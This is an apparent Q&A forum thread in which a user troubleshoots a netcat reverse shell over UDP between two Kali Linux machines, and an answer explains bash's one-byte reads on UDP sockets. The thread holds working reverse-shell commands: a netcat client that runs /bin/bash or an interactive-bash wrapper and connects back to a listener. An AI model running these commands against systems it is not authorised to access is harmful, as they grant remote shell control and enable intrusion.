# Reverse shell using netcat and UDP is not working

Tags: linux, bash, shell, netcat

I'm trying to set up a reverse shell between two Linux machines (Kali v. 1.0.9), using the default installation of netcat.
Using the commands below, I was able to make a connection and relay text information between the two machines:

Listener:

```
nc -luvvp <port>
```

Client:

```
nc -uvv <ip> <port>
```

However, modifying the client's arguments to include executing bash upon a connection:

```
nc -uvv <ip> <port> -e /bin/bash
```

And no connection is made, I'm not quite sure how to get this to work, this doesn't seem to be a problem that other people have experienced and was unsure of how to solve the issue. It might also help to know that these commands work fine using the normal TCP mode, it's only after adding the u flag that it stops working for shells. Any help would be appreciated, thanks!

Comment: Where is the documentation for this `nc -e` option?  I don't see it here: http://linux.die.net/man/1/nc

Comment: Can't seem to find the docs for it... nc -h gives me the option as second on the list, basically just the path of the executable to launch after a connection is made. Perhaps it's  Kali/Debian specific?

Answer (score 0):

I did some experiments and realized that tunneling shell session via netcat over UDP is almost impossible. The bash does not know that the underlying file descriptor is the UDP socket bash calls *read()* with buffer size 1. That is fine for interactive shell but when received UDP datagram contains more than 1 byte then data is lost (except the first byte in the datagram).

The netcat uses the standard line buffer at the stdin and the whole line is sent in a single UDP datagram. But bash reads only the first byte from each line.

The other problem is that the client netcat exucuted via command

```
nc -uvv -e "/bin/bash" <ip> <port>
```

does not send any data to server because the bash is executed in non-interactive mode and it just waits for a command. The solution is to write a script to execute bash in the interactive mode:

```
$ cat bashinteractive
#!/bin/bash
/bin/bash -i
```

and call server

```
$ nc -luvvp <port>
```

and client

```
nc -uvv -e "./bashinteractive" <ip> <port>
```

But the usage is very inconvenient. It is possible to write command on server when each byte is followed by *ENTER*

```
$ ./nc -luvvp 6666
listening on [any] 6666 ...
connect to [10.0.2.15] from xxx.yyy.zzz [10.0.2.16] 37552
$ c
cd
d 
 /
/

$ l
ls
s 
 -
-l
l

total 92
drwxr-xr-x   2 root root  4096 Feb  7 15:22 bin
....
drwxr-xr-x  13 root root  4096 Oct 16  2013 var
$ e
ex
xi
it
t

exit

 sent 30, rcvd 1422 : Connection refused
```

So my recommendation is to use other tool than netcat. Perhaps you can try
http://code.google.com/p/udptunnel/

Comment: Thank you, but that doesn't seem to be true in this version of netcat, at least with TCP connections. if I use the same commands without the "u" flag, I can run the client's shell from the server, and do things from there, which is the purpose of this, since the client will be behind a NAT, I need it to connect back to the server and allow me to have remote shell access. It's only after I switch to udp that it stops working.